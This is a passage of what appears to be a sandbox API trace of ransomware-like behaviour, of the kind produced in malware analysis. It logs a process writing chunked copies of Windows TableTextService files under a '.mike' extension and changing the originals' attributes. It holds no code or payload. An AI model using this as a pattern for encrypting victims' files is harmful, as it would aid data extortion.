NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.072] SetFilePointer (in: hFile=0x288, lDistanceToMove=225280, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x37000 [0129.073] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.074] SetFilePointer (in: hFile=0x288, lDistanceToMove=235520, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x39800 [0129.075] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.076] SetFilePointer (in: hFile=0x288, lDistanceToMove=245760, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x3c000 [0129.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.078] SetFilePointer (in: hFile=0x288, lDistanceToMove=256000, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x3e800 [0129.080] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.081] SetFilePointer (in: hFile=0x288, lDistanceToMove=266240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x41000 [0129.082] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.082] SetFilePointer (in: hFile=0x288, lDistanceToMove=276480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x43800 [0129.084] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.084] SetFilePointer (in: hFile=0x288, lDistanceToMove=286720, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x46000 [0129.086] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.086] SetFilePointer (in: hFile=0x288, lDistanceToMove=296960, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x48800 [0129.087] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.088] SetFilePointer (in: hFile=0x288, lDistanceToMove=307200, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x4b000 [0129.089] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.090] SetFilePointer (in: hFile=0x288, lDistanceToMove=317440, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x4d800 [0129.091] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.092] SetFilePointer (in: hFile=0x288, lDistanceToMove=327680, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x50000 [0129.093] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.094] SetFilePointer (in: hFile=0x288, lDistanceToMove=337920, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x52800 [0129.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt", lpFilePart=0x0) returned 0x4c [0129.096] SetFilePointer (in: hFile=0x288, lDistanceToMove=348160, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x55000 [0129.097] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.097] SetFilePointer (in: hFile=0x288, lDistanceToMove=358400, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x57800 [0129.099] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.099] SetFilePointer (in: hFile=0x288, lDistanceToMove=368640, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x5a000 [0129.101] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.101] SetFilePointer (in: hFile=0x288, lDistanceToMove=378880, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x5c800 [0129.102] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.103] SetFilePointer (in: hFile=0x288, lDistanceToMove=389120, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x5f000 [0129.104] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.105] SetFilePointer (in: hFile=0x288, lDistanceToMove=399360, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x61800 [0129.106] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.107] SetFilePointer (in: hFile=0x288, lDistanceToMove=409600, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x64000 [0129.109] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.109] SetFilePointer (in: hFile=0x288, lDistanceToMove=419840, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x66800 [0129.111] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.111] SetFilePointer (in: hFile=0x288, lDistanceToMove=430080, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x69000 [0129.112] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.113] SetFilePointer (in: hFile=0x288, lDistanceToMove=440320, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x6b800 [0129.114] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.115] SetFilePointer (in: hFile=0x288, lDistanceToMove=450560, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x6e000 [0129.116] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.117] SetFilePointer (in: hFile=0x288, lDistanceToMove=460800, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x70800 [0129.118] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.119] SetFilePointer (in: hFile=0x288, lDistanceToMove=471040, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x73000 [0129.122] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.123] SetFilePointer (in: hFile=0x288, lDistanceToMove=481280, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x75800 [0129.124] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.125] SetFilePointer (in: hFile=0x288, lDistanceToMove=491520, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x78000 [0129.126] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.127] SetFilePointer (in: hFile=0x288, lDistanceToMove=501760, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x7a800 [0129.128] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.129] SetFilePointer (in: hFile=0x288, lDistanceToMove=512000, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x7d000 [0129.130] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.130] SetFilePointer (in: hFile=0x288, lDistanceToMove=522240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x7f800 [0129.132] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.133] SetFilePointer (in: hFile=0x288, lDistanceToMove=532480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x82000 [0129.135] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.135] SetFilePointer (in: hFile=0x288, lDistanceToMove=542720, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x84800 [0129.137] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.137] SetFilePointer (in: hFile=0x288, lDistanceToMove=552960, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x87000 [0129.139] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.139] SetFilePointer (in: hFile=0x288, lDistanceToMove=563200, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x89800 [0129.141] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.143] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.144] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt.mike", lpFilePart=0x0) returned 0x51 [0129.271] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt", dwFileAttributes=0x80) returned 0 [0129.276] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0129.445] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt", dwFileAttributes=0x80) returned 0 [0129.452] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0129.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.765] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.765] GetFileType (hFile=0x284) returned 0x1 [0129.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.766] GetFileType (hFile=0x284) returned 0x1 [0129.766] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xb1a20 [0129.766] WriteFile (in: hFile=0x284, lpBuffer=0x2111624*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2111624*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.766] CloseHandle (hObject=0x284) returned 1 [0129.766] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.766] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.767] GetFileType (hFile=0x284) returned 0x1 [0129.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.767] GetFileType (hFile=0x284) returned 0x1 [0129.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.768] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.768] GetFileType (hFile=0x284) returned 0x1 [0129.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.768] GetFileType (hFile=0x284) returned 0x1 [0129.768] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xb4220 [0129.768] WriteFile (in: hFile=0x284, lpBuffer=0x211e694*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x211e694*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.768] CloseHandle (hObject=0x284) returned 1 [0129.768] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.769] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.769] GetFileType (hFile=0x284) returned 0x1 [0129.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.769] GetFileType (hFile=0x284) returned 0x1 [0129.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.770] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.770] GetFileType (hFile=0x284) returned 0x1 [0129.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.770] GetFileType (hFile=0x284) returned 0x1 [0129.770] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xb6a20 [0129.770] WriteFile (in: hFile=0x284, lpBuffer=0x212b704*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x212b704*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.770] CloseHandle (hObject=0x284) returned 1 [0129.770] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.771] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.771] GetFileType (hFile=0x284) returned 0x1 [0129.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.771] GetFileType (hFile=0x284) returned 0x1 [0129.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.772] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.772] GetFileType (hFile=0x284) returned 0x1 [0129.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.772] GetFileType (hFile=0x284) returned 0x1 [0129.772] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xb9220 [0129.772] WriteFile (in: hFile=0x284, lpBuffer=0x2138774*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2138774*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.772] CloseHandle (hObject=0x284) returned 1 [0129.772] GetFullPathNameW (in: lpFileName="C:\\Program Files 